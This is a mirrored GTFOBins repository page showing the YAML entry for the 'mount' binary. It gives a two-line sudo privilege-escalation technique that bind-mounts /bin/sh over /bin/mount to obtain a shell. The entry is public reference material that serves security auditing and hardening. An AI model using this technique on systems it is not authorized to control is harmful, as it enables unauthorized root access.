1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/mount
2026-01-06 17:44:19 +01:00

12 lines
225 B
Plaintext

---
functions:
privilege-escalation:
- code: |-
mount -o bind /bin/sh /bin/mount
mount
comment: |-
This overrides `mount` itself with a shell (or any other executable).
contexts:
sudo:
...